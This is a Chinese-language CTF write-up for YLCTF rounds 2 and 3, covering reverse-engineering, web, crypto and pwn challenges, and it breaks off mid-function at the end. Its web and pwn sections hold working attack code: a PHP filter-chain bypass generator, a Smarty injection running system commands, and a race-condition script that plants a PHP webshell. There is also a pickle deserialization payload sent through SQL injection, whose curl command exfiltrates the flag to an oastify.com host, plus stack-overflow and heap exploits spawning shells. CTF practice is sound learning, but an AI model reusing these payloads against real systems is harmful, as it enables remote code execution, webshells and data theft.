def decipher(v, k):
v0, v1 = v
sum = (289739961 * 40) & 0xffffffff # Initial sum value
delta = 289739961
for i in range(40):
v1 -= (((v0 >> 5) ^ (16 * v0)) + v0) ^ (k[(sum >> 11) & 3] + sum)
v1 &= 0xffffffff
sum -= delta
sum &= 0xffffffff
v0 -= (((v1 >> 3) ^ (4 * v1)) + v1) ^ (k[sum & 3] + sum)
v0 &= 0xffffffff
return [v0, v1]
# 目标密文
target_v0 = 1913208188
target_v1 = -1240730499 & 0xffffffff # 转换为无符号整数
# 密钥
key = [4097, 8194, 12291, 16388]
# 解密
decrypted = decipher([target_v0, target_v1], key)
print(f"解密结果: {decrypted}")
print(f"输入的两个标签应该是: {decrypted[0]} 和 {decrypted[1]}")
[Round 2] ezwasm
外部改成大写即可
Web
[Round 2] Cmnts
Z2V0X3RoMXNfZjFhZy5waHA= #get_th1s_f1ag.php
?key=a7a795a8efb7c30151031c2cb700ddd9
变量覆盖
[Round 2] Pseudo(复现)
可以看到给的附件里面的下载的php文件
<?php
error_reporting(0);
if (isset($_GET['file'])) {
$data = file_get_contents($_GET['file']);
$file = tmpfile();
fwrite($file, $data);
fflush($file);
$type = mime_content_type(stream_get_meta_data($file)['uri']);
fclose($file);
if (!in_array($type,['image/jpg','image/jpeg', 'image/png', 'image/gif'])) {
echo "error!!!";
exit;
}else{
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="download.jpg"');
header('Expires: 0');
header('Cache-Control: must-revalidate');
header('Pragma: public');
echo($data);
exit;
}
}
可以利用这里的函数漏洞得到flag,关键点是需要绕过mime_content_type函数,可以利用filterchain进行绕过得到flag
下面是脚本,或者用GitHub上面的脚本
<?php
$base64_payload = "R0lGODlB"; /*GIF89A*/
$conversions = array(
'/' => 'convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4',
'0' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2',
'1' => 'convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4',
'2' => 'convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP949.UTF32BE|convert.iconv.ISO_69372.CSIBM921',
'3' => 'convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.ISO6937.8859_4|convert.iconv.IBM868.UTF-16LE',
'4' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2',
'5' => 'convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.GBK.UTF-8|convert.iconv.IEC_P27-1.UCS-4LE',
'6' => 'convert.iconv.UTF-8.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.CSIBM943.UCS4|convert.iconv.IBM866.UCS-2',
'7' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2',
'8' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2',
'9' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB',
'A' => 'convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213',
'B' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2',
'C' => 'convert.iconv.UTF8.CSISO2022KR',
'D' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2',
'E' => 'convert.iconv.IBM860.UTF16|convert.iconv.ISO-IR-143.ISO2022CNEXT',
'F' => 'convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB',
'G' => 'convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90',
'H' => 'convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213',
'I' => 'convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.BIG5.SHIFT_JISX0213',
'J' => 'convert.iconv.863.UNICODE|convert.iconv.ISIRI3342.UCS4',
'K' => 'convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE',
'L' => 'convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.R9.ISO6937|convert.iconv.OSF00010100.UHC',
'M' => 'convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.iconv.UTF16BE.866|convert.iconv.MACUKRAINIAN.WCHAR_T',
'N' => 'convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4',
'O' => 'convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775',
'P' => 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB',
'Q' => 'convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500-1983.UCS-2BE|convert.iconv.MIK.UCS2',
'R' => 'convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4',
'S' => 'convert.iconv.UTF-8.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS',
'T' => 'convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500.L4|convert.iconv.ISO_8859-2.ISO-IR-103',
'U' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932',
'V' => 'convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB',
'W' => 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936',
'X' => 'convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932',
'Y' => 'convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361',
'Z' => 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16',
'a' => 'convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE',
'b' => 'convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE',
'c' => 'convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2',
'd' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2',
'e' => 'convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UTF16.EUC-JP-MS|convert.iconv.ISO-8859-1.ISO_6937',
'f' => 'convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213',
'g' => 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8',
'h' => 'convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE',
'i' => 'convert.iconv.DEC.UTF-16|convert.iconv.ISO8859-9.ISO_6937-2|convert.iconv.UTF16.GB13000',
'j' => 'convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.iconv.CP950.UTF16',
'k' => 'convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2',
'l' => 'convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE',
'm' => 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.CP1163.CSA_T500|convert.iconv.UCS-2.MSCP949',
'n' => 'convert.iconv.ISO88594.UTF16|convert.iconv.IBM5347.UCS4|convert.iconv.UTF32BE.MS936|convert.iconv.OSF00010004.T.61',
'o' => 'convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-4LE.OSF05010001|convert.iconv.IBM912.UTF-16LE',
'p' => 'convert.iconv.IBM891.CSUNICODE|convert.iconv.ISO8859-14.ISO6937|convert.iconv.BIG-FIVE.UCS-4',
'q' => 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.GBK.CP932|convert.iconv.BIG5.UCS2',
'r' => 'convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.ISO-IR-99.UCS-2BE|convert.iconv.L4.OSF00010101',
's' => 'convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90',
't' => 'convert.iconv.864.UTF32|convert.iconv.IBM912.NAPLPS',
'u' => 'convert.iconv.CP1162.UTF32|convert.iconv.L4.T.61',
'v' => 'convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.iconv.ISO_6937-2:1983.R9|convert.iconv.OSF00010005.IBM-932',
'w' => 'convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE',
'x' => 'convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS',
'y' => 'convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT',
'z' => 'convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937',
);
$filters = "convert.base64-encode|";
# make sure to get rid of any equal signs in both the string we just generated and the rest of the file
$filters .= "convert.iconv.UTF8.UTF7|";
foreach (str_split(strrev($base64_payload)) as $c) {
$filters .= $conversions[$c] . "|";
$filters .= "convert.base64-decode|";
$filters .= "convert.base64-encode|";
$filters .= "convert.iconv.UTF8.UTF7|";
}
$filters .= "convert.base64-decode";
$final_payload = "php://filter/{$filters}/resource=/flag";
echo $final_payload;
[Round 2] PHUPE(复现)
这题写的时候的思路就是尝试文件上传进行smarty的模板注入,但是没有成功。
0x01
TPL是Smarty模板引擎使用的模板文件格式,它允许将PHP逻辑代码与HTML展示代码分离,使用特殊的标签语法 {标签} 来实现动态内容。
smarty 可以使用 math + 8进制进行绕过
{extends file='views/layout.tpl'}
{block name=content}
<h1>CTF File Reader</h1>
<form method="post" enctype="multipart/form-data">
<input type="file" name="file">
<button type="submit">Upload</button>
</form>
<pre>{$file_content}</pre>
{math equation="(\"\\163\\171\\163\\164\\145\\155\")(\"\\143\\141\\164\\40\\57\\146\\154\\141\\147\")"}
{/block}
~~跟着复现没有成功,感觉可能中间跳步骤了。~~时隔一周回来填坑,确实是自己的问题,没有好好研究给的附件,需要在对应的文件上进行文件的覆盖
然后就有flag了
0x02
从0CTF一道题看move_uploaded_file的一个细节问题,参考链接
[Round 2] RedFox(复现)
先注册一个账号进行登陆
有一个上传评论的地方,发现可以有ssrf的漏洞(当时其实想到这层了,没注意回显包)
然后测试一下/flag有无发现没有,
/uploads/profile_0f1726ba83325848d47e216b29d5ab99.jpg,后面我也没找到本地文件,先到这吧。,继续来填坑。
不能直接读到flag,尝试读index.php
<?php
session_start();
require_once 'config.php';
require_once 'Database.php';
require_once 'User.php';
require_once 'Post.php';
require_once 'Message.php';
$db = new Database();
$user = new User($db);
$post = new Post($db);
$message = new Message($db);
$error = '';
$success = '';
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
if (isset($_POST['action'])) {
switch ($_POST['action']) {
case 'register':
if (isset($_POST['username']) && isset($_POST['password']) && isset($_POST['email'])) {
if ($user->register($_POST['username'], $_POST['password'], $_POST['email'])) {
$success = "Registration successful. Please log in.";
} else {
$error = "Registration failed. Please try again.";
}
}
break;
case 'login':
if (isset($_POST['username']) && isset($_POST['password'])) {
if ($user->login($_POST['username'], $_POST['password'])) {
$success = "Login successful.";
} else {
$error = "Invalid username or password.";
}
}
break;
case 'create_post':
if (isset($_SESSION['user_id']) && isset($_POST['content'])) {
$imageUrl = isset($_POST['image_url']) ? $_POST['image_url'] : null;
if ($post->create($_SESSION['user_id'], $_POST['content'], $imageUrl)) {
$success = "Post created successfully.";
} else {
$error = "Failed to create post.";
}
}
break;
case 'send_message':
if (isset($_SESSION['user_id']) && isset($_POST['to_user_id']) && isset($_POST['content'])) {
if ($message->send($_SESSION['user_id'], $_POST['to_user_id'], $_POST['content'])) {
$success = "Message sent successfully.";
} else {
$error = "Failed to send message.";
}
}
break;
case 'download_message':
if (isset($_SESSION['user_id']) && isset($_POST['data'])) {
if ($user->test($_SESSION['user_id'], $_POST['data'])) {
$success = "successfully.";
} else {
$error = "fail.";
}
}
break;
}
}
}
$feed = $post->getFeed();
?>
这是Database.php
<?php
class Database {
private $conn;
public function __construct() {
$this->conn = new mysqli(DB_HOST, DB_USER, DB_PASS, DB_NAME);
if ($this->conn->connect_error) {
die("Connection failed: " . $this->conn->connect_error);
}
}
public function query($sql, $params = []) {
$stmt = $this->conn->prepare($sql);
if ($stmt === false) {
return false;
}
if (!empty($params)) {
$types = str_repeat('s', count($params));
$stmt->bind_param($types, ...$params);
}
$stmt->execute();
if (stripos($sql, 'select') !== false) {
return $stmt->get_result();
} else {
return $stmt->affected_rows;
}
}
public function escape($value) {
return $this->conn->real_escape_string($value);
}
}
这是User.php
<?php
class User {
private $db;
public function __construct($db) {
$this->db = $db;
}
public function register($username, $password, $email) {
$hashedPassword = password_hash($password, PASSWORD_DEFAULT);
$sql = "INSERT INTO users (username, password, email) VALUES (?, ?, ?)";
return $this->db->query($sql, [$username, $hashedPassword, $email]);
}
public function login($username, $password) {
$sql = "SELECT * FROM users WHERE username = ?";
$result = $this->db->query($sql, [$username]);
if ($result->num_rows == 1) {
$user = $result->fetch_assoc();
if (password_verify($password, $user['password'])) {
$_SESSION['user_id'] = $user['id'];
$_SESSION['username'] = $user['username'];
return true;
}
}
return false;
}
public function test($id,$data){
if(count(array_unique(str_split($data))) <= 7 && !preg_match('/[a-z0-9]/i', $data)){
eval($data);
}
}
}
post.php
<?php
class Post {
private $db;
public function __construct($db) {
$this->db = $db;
}
public function create($userId, $content, $imageUrl = null) {
$sql = "INSERT INTO posts (user_id, content, image_url) VALUES (?, ?, ?)";
$image = $this->uploadImage($userId,$imageUrl);
return $this->db->query($sql, [$userId, $content, $image]);
}
public function getFeed($page = 1, $limit = 10) {
$offset = ($page - 1) * $limit;
$sql = "SELECT p.*, u.username FROM posts p JOIN users u ON p.user_id = u.id ORDER BY p.created_at DESC LIMIT ?, ?";
return $this->db->query($sql, [$offset, $limit]);
}
public function uploadImage($userId, $imageUrl) {
$filename = "";
$curl = curl_init();
curl_setopt ($curl, CURLOPT_URL, $imageUrl);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
$imageContent = curl_exec ($curl);
curl_close ($curl);
if(preg_match('/http|gopher|dict/i',$imageUrl) && preg_match('/php|<\?|script/i',$imageContent)){
return false;
}
if ($imageContent !== false && strlen($imageContent)>50) {
$filename = 'profile_' . md5($imageUrl) . '.jpg';
file_put_contents('./uploads/' . $filename, $imageContent);
}else{
return false;
}
return "./uploads/" . $filename;
}
}
Message.php
<?php
class Message {
private $db;
public function __construct($db) {
$this->db = $db;
}
public function send($fromUserId, $toUserId, $content) {
$sql = "INSERT INTO messages (from_user_id, to_user_id, content) VALUES (?, ?, ?)";
return $this->db->query($sql, [$fromUserId, $toUserId, $content]);
}
public function getConversation($user1Id, $user2Id, $page = 1, $limit = 20) {
$offset = ($page - 1) * $limit;
$sql = "SELECT * FROM messages WHERE (from_user_id = ? AND to_user_id = ?) OR (from_user_id = ? AND to_user_id = ?) ORDER BY created_at DESC LIMIT ?, ?";
return $this->db->query($sql, [$user1Id, $user2Id, $user2Id, $user1Id, $offset, $limit]);
}
}
?>
打包分析一下发现存储在一个文件夹跟进,发现有漏洞的地方是在post.php里,但是已经利用过了
在index.php里有
public function test($id,$data){
if(count(array_unique(str_split($data))) <= 7 && !preg_match('/[a-z0-9]/i', $data)){
eval($data);
}
}
可以打一个条件竞争进去
file:///etc/php/7.0/apache2/php.ini
然后上exp吧
import io
import sys
import requests
import threading
sessid = 'orange'
def WRITE(session):
while True:
f = io.BytesIO(b'a' * 1024 * 50)
session.post(
'http://challenge.yuanloo.com:27814/index.php',
data={
"PHP_SESSION_UPLOAD_PROGRESS": "1\necho '<?php eval($_POST[a]);'>/var/www/html/uploads/shell.php\n"},
files={"file": ('wi.txt', f)},
cookies={'PHPSESSID': sessid}
)
def READ(session):
while True:
request = requests.session()
data = {
'action': 'login',
'username': '123',
'password': '123'
}
request.post("http://challenge.yuanloo.com:27814/", data=data)
data = {
'action': 'download_message',
'data': '`. /???/???/???/???/??????????????`;'
}
request.post("http://challenge.yuanloo.com:27814/", data=data)
if requests.get("http://challenge.yuanloo.com:27814/uploads/shell.php").status_code != 404:
print('Success!')
exit(0)
with requests.session() as session:
t1 = threading.Thread(target=WRITE, args=(session,))
t1.daemon = True
t1.start()
READ(session)
[Round 2] SNEKLY(复现)
from flask import Flask, render_template, request, jsonify
from flask_login import LoginManager, UserMixin
import sqlite3
import base64
import pickle
import os
app = Flask(__name__)
app.config['SECRET_KEY'] = '060ac533d307'
app.static_folder = 'static'
login_manager = LoginManager()
login_manager.init_app(app)
login_manager.login_view = 'login'
user = {}
current_dir = os.path.dirname(os.path.abspath(__file__))
db_path = os.path.join(current_dir, 'data.db')
class User(UserMixin):
def __init__(self, id, username, password_hash, data):
self.id = id
self.username = username
self.password_hash = password_hash
self.data = data
@login_manager.user_loader
def load_user(user_id):
conn = sqlite3.connect(db_path)
cursor = conn.cursor()
cursor.execute("SELECT * FROM users WHERE id = ?", (user_id,))
user_data = cursor.fetchone()
conn.close()
if user_data:
return User(id=user_data[0], username=user_data[1], password_hash=user_data[2], data=user_data[3])
return None
@app.route('/')
def index():
return render_template("login.html")
@app.route('/login', methods=['POST'])
def login():
global user
if request.method == "POST":
username = request.form.get('username')
password = request.form.get('password')
if not username or not password:
return jsonify({"code": 1, "msg": "用户名或密码不能为空"})
try:
con = sqlite3.connect(db_path)
cur = con.cursor()
output = cur.execute(
'SELECT * FROM users WHERE username = {post[username]!r} AND password = {post[password]!r}'
.format(post=request.form)
).fetchone()
if output is None:
return jsonify({"code": 1, "msg": "用户名或密码错误"})
user['id'], user['username'], user['password'], user['data'] = output
# 使用安全的密码验证方法
if (user['username'] == username) and (user['password'] == password):
return jsonify({"code": 0, "msg": "登录成功"})
else:
user = {}
return jsonify({"code": 1, "msg": "用户名或密码错误"})
except sqlite3.Error as e:
print(f"数据库错误: {e}")
return jsonify({"code": 1, "msg": "服务器错误,请稍后重试"})
return jsonify({"code": 1, "msg": "无效的请求方法"})
@app.route('/unSer')
def unSer():
try:
data = base64.b64decode(user['data'])
if any(keyword in data for keyword in [b'getattr', b'R', b'map', b'eval', b'exec', b'import']):
raise pickle.UnpicklingError("unSer")
pickle.loads(data)
except Exception as e:
pass
return "unSer"
if __name__ == "__main__":
app.run(host='0.0.0.0')
看到有pickle的模块大抵应该是考察python的反序列化,定位一下关键代码
def unSer():
try:
data = base64.b64decode(user['data'])
if any(keyword in data for keyword in [b'getattr', b'R', b'map', b'eval', b'exec', b'import']):
raise pickle.UnpicklingError("unSer")
pickle.loads(data)
except Exception as e:
pass
return "unSer"
使用bp打一个dnslog
import base64
import requests
def quine(data):
data = data.replace('$$', "REPLACE(REPLACE(REPLACE($$,CHAR(39),CHAR(34)),CHAR(36),$$), CHAR(92), CHAR())")
data1 = data.replace("'", '"').replace('$$', "'$'")
data = data.replace('$$', f'"{data1}"')
return data
def exp():
username = "test\"'"
opcode = b'''c__builtin__
filter
p0
0(S'curl http://`cat /f*`.urpybxuysw5jjp2ie3koqo4ia9g14rsg.oastify.com'
tp1
0(cos
system
g1
tp2
0g0
g2
\x81p3
0c__builtin__
tuple
p4
(g3
t\x81.'''
a = base64.b64encode(opcode).decode()
res = ''
for i in a:
if ord(i) > 58 or ord(i) < 47:
res += "||CHAR(" + str(ord(i)) + ")"
else:
res += "||" + i
res = res[2:]
password = f" UNION SELECT $$, CHAR({','.join(str(ord(c)) for c in username)}), $$,({res});-- -"
password = quine(password)
requests.post(url="http://challenge.yuanloo.com:29180/login",
data={
"username": username,
"password": password
})
requests.get(url="http://challenge.yuanloo.com:29180/unSer")
if __name__ == "__main__":
exp()
学学opcode吧
开头的 c__builtin__:
c 表示这个数据结构是一个类的调用。
__builtin__ 是 Python 内置模块,意味着后续会调用该模块中的函数。
filter 是内置函数,用于过滤序列。它将在后续的调用中被使用。
p0 表示将后续的对象(0表示第一个对象)保存到位置 0。
0(S'curl http://... 是一个字符串对象,表示要执行的命令。
这里的命令使用反引号执行 cat /f*,并将输出发送到指定的 URL。
tp1 是另一个指令,用于标记后续的数据结构类型。
0(cos 说明后续数据是与 cos 相关
system 是 os 模块中的一个函数,用于执行系统命令。
g1 用于获取在之前定义的对象,可能是一个函数的引用。
tp2 标记下一个数据结构的类型。
0g0 指获取第一个对象(即命令字符串)。
g2 表示下一个对象的获取。
\x81 是一个转义字符,用于处理特定的内部格式。
p3 表示将此对象保存到位置 3。
0c__builtin__ 和 tuple:
这段是为了创建一个元组,包含前面定义的对象。
最终的结构是一个包含 system 函数和命令的元组。
p4 将这个元组保存在位置 4。
(g3 是标记获取之前保存的对象(即要执行的命令)。
Round 3
crypto
[Round 3] ezlcg
from pwn import *
import re
from Crypto.Util.number import inverse
p = remote("challenge.yuanloo.com", 22178)
# 跳过前27行
for _ in range(27):
p.recvline()
def solve_lcg_parameters(states, N):
"""求解LCG的参数a和b"""
diffs = []
for i in range(len(states) - 1):
diffs.append((states[i + 1] - states[i]) % N)
a_candidates = []
for i in range(len(diffs) - 1):
if diffs[i + 1] != 0:
try:
a = (diffs[i + 1] * inverse(diffs[i], N)) % N
a_candidates.append(a)
except:
continue
if len(a_candidates) > 0:
a = max(set(a_candidates), key=a_candidates.count)
b = (states[1] - a * states[0]) % N
return a, b
return None, None
def find_seed(N, num1, num2, num3):
"""从三个连续状态值找到初始种子"""
states = [num1, num2, num3]
# 求解a和b
a, b = solve_lcg_parameters(states, N)
if not a or not b:
return None, None, None
# 反推seed
seed = ((num1 - b) * inverse(a, N)) % N
# 验证
state = seed
verified = True
for expected in [num1, num2, num3]:
state = (state * a + b) % N
if state != expected:
verified = False
break
return seed, a, b if verified else (None, None, None)
for _ in range(50):
data = p.recvuntil("seed =".encode()).decode()
a_match = re.search(r'a=(\d+)', data)
b_match = re.search(r'b=(\d+)', data)
N_match = re.search(r'N=(\d+)', data)
num1_match = re.search(r'num1=(\d+)', data)
if a_match and b_match and N_match and num1_match:
a = int(a_match.group(1))
b = int(b_match.group(1))
N = int(N_match.group(1))
num1 = int(num1_match.group(1))
def find_seed_a_b(a, b, N, num1):
left_side = (num1 - b) % N
a_inv = inverse(a, N)
seed = (left_side * a_inv) % N
return seed
seed = find_seed_a_b(a, b, N, num1)
p.sendline(str(seed))
response = p.recvuntil("success!".encode())
print(response.decode())
response = p.recvuntil("Challenge two,30 Round".encode())
if "Challenge two,30 Round" in response.decode():
for _ in range(30):
data = p.recvuntil("seed =".encode()).decode()
a_match = re.search(r'a=(\d+)', data)
N_match = re.search(r'N=(\d+)', data)
num1_match = re.search(r'num1=(\d+)', data)
num2_match = re.search(r'num2=(\d+)', data)
if a_match and N_match and num1_match and num2_match:
a = int(a_match.group(1))
N = int(N_match.group(1))
num1 = int(num1_match.group(1))
num2 = int(num2_match.group(1))
def lcg_seed(num1, num2, a, N):
b = (num2 - (a * num1) % N + N) % N
seed = (num1 - b) * inverse(a, N) % N
return seed
seed = lcg_seed(num1, num2, a, N)
p.sendline(str(seed))
response = p.recvuntil("success!".encode())
print(response.decode())
# Challenge three 部分
data = p.recvuntil("Challenge three,10 Round".encode()).decode()
if "Challenge three,10 Round" in data:
print("进入 Challenge three, 10 Round")
for _ in range(10):
data = p.recvuntil("seed =".encode()).decode()
N_match = re.search(r'N=(\d+)', data)
num1_match = re.search(r'num1=(\d+)', data)
num2_match = re.search(r'num2=(\d+)', data)
num3_match = re.search(r'num3=(\d+)', data)
if N_match and num1_match and num2_match and num3_match:
N = int(N_match.group(1))
num1 = int(num1_match.group(1))
num2 = int(num2_match.group(1))
num3 = int(num3_match.group(1))
# 使用 LCG 解密函数找到 seed
seed, a, b = find_seed(N, num1, num2, num3)
if seed is not None:
p.sendline(str(seed))
response = p.recvuntil("success!".encode())
print(response.decode())
else:
print("无法找到种子")
p.interactive()
[Round 3] QWQ
明显的颜文字,转一下再base解密即可
Misc
[Round 3] Blackdoor
一个文件夹,用d盾扫一下发现危险文件,里面有MD5值,套一下得到flag
Pwn
[Round 3] Secret
附件ida打开输入nc连接输入密文SuperSecretPassword得到flag
[Round 3] ezstack3
先看mian和vuln,再观察system利用栈溢出漏洞首先发送填充数据以覆盖返回地址,然后接收 EBP 地址并计算其偏移。接着构造 payload,调用 system 函数执行 /bin/sh,最终获得交互式 shell。
from pwn import *
p = remote('challenge.yuanloo.com', 32407)
context(os='linux', arch='i386', log_level='debug')
p.recvuntil(b'Welcome to YLCTF stack3')
p.send(b'a' * 0x30)
p.recvuntil(b'a' * 0x30)
ebp = u32(p.recv(4)) - 16
p.recvuntil(b'pwn!')
p.send(
p32(0x080490C0) + # system
p32(0) + # argument for system
p32(ebp - 36) + # return address
b'/bin/sh\x00' +
b'a' * 28 +
p32(ebp - 52) + # old EBP
p32(0x08049324) # leave_ret
)
p.interactive()
[Round 3] null
利用了 off-by-one 漏洞,通过 edit 函数实现堆块重叠,进而修改前一个堆块的 fd 指针以覆盖 free_hook。当再次释放该堆块时,程序会调用 free_hook 指向的地址,执行 system 函数,从而获取权限并启动一个 shell。
from pwn import *
context.os = 'linux'
context.arch = 'amd64'
context.log_level = 'debug'
def print_info(x): print('\x1b[01;38;5;214m' + x + '\x1b[0m')
def print_error(x): print('\x1b[01;38;5;1m' + x + '\x1b[0m')
class Exploit:
def __init__(self, is_remote=True):
self.elf = ELF('./pwn')
self.libc = ELF('./libc-2.27.so')
if is_remote:
self.p = remote('challenge.yuanloo.com', 39010)
else:
self.p = process('./pwn')
self.libc_base = 0
self.malloc_hook = 0
self.free_hook = 0
self.system = 0
self.bin_sh = 0
def get_addr64(self):
return u64(self.p.recvuntil(b"\x7f")[-6:].ljust(8, b'\x00'))
def get_libc_offsets(self):
self.malloc_hook = self.libc_base + self.libc.sym['__malloc_hook']
self.free_hook = self.libc_base + self.libc.sym['__free_hook']
self.system = self.libc_base + self.libc.sym['system']
self.bin_sh = self.libc_base + next(self.libc.search(b"/bin/sh\x00"))
# Heap operations
def add(self, index, size):
self.p.recvuntil(b':')
self.p.sendline(str(1))
self.p.recvuntil(b"Index: ")
self.p.sendline(str(index))
self.p.recvuntil(b"Size ")
self.p.sendline(str(size))
def free(self, index):
self.p.recvuntil(b':')
self.p.sendline(str(4))
self.p.recvuntil(b"Index: ")
self.p.sendline(str(index))
def show(self, index):
self.p.recvuntil(b':')
self.p.sendline(str(3))
self.p.recvuntil(b"Index: ")
self.p.sendline(str(index))
def edit(self, index, content):
self.p.recvuntil(b':')
self.p.sendline(str(2))
self.p.recvuntil(b"Index: ")
self.p.sendline(str(index))
self.p.recvuntil(b"Content: ")
self.p.sendline(content)
def exploit(self):
# Initial heap setup
for i in range(9):
self.add(i, 0x90)
for i in range(8):
self.free(i)
for i in range(7):
self.add(i, 0x90)
self.add(7, 0x88)
self.show(7)
self.libc_base = self.get_addr64() - 4111664
print_info(f"Libc base: {hex(self.libc_base)}")
self.get_libc_offsets()
self.add(9, 0x18)
self.add(10, 0x68)
self.add(11, 0x68)
self.add(12, 0x68)
self.add(13, 0x18)
self.edit(9, b'a' * 0x18 + p8(0xe1))
self.free(10)
self.add(10, 0xd8)
self.free(12)
self.free(11)
self.edit(10, b'\x00' * 0x68 + p64(0x71) + p64(self.free_hook))
self.add(14, 0x68)
self.add(15, 0x68)
self.edit(15, p64(self.system))
self.edit(9, b'/bin/sh\x00')
self.free(9)
self.p.interactive()
def main():
exp = Exploit(is_remote=True)
exp.exploit()
if __name__ == "__main__":
main()
Re
[Round 3] ezmaze(一血)
import hashlib
from collections import deque
def visualize_maze(maze_str, width=10):
"""Visualize the maze in a grid format."""
return '\n'.join(maze_str[i:i + width] for i in range(0, len(maze_str), width))
def is_valid_move(maze, pos):
"""Check if the current position is valid."""
return 0 <= pos < len(maze) and maze[pos] in ['+', 'F']
def solve_maze():
maze = "*****++*********+******+*++******+++*****F*+*******+*+++*****+***++****+***+*****+***+*+***+++++++************"
start_pos = 5
moves = {'w': -10, 's': 10, 'a': -1, 'd': 1}
queue = deque([(start_pos, "")])
visited = {start_pos}
while queue:
pos, path = queue.popleft()
if maze[pos] == 'F':
return path
for move_char, move_val in moves.items():
new_pos = pos
while is_valid_move(maze, new_pos + move_val):
new_pos += move_val
if new_pos not in visited:
visited.add(new_pos)
queue.append((new_pos, path + move_char))
return None
def verify_solution(solution):
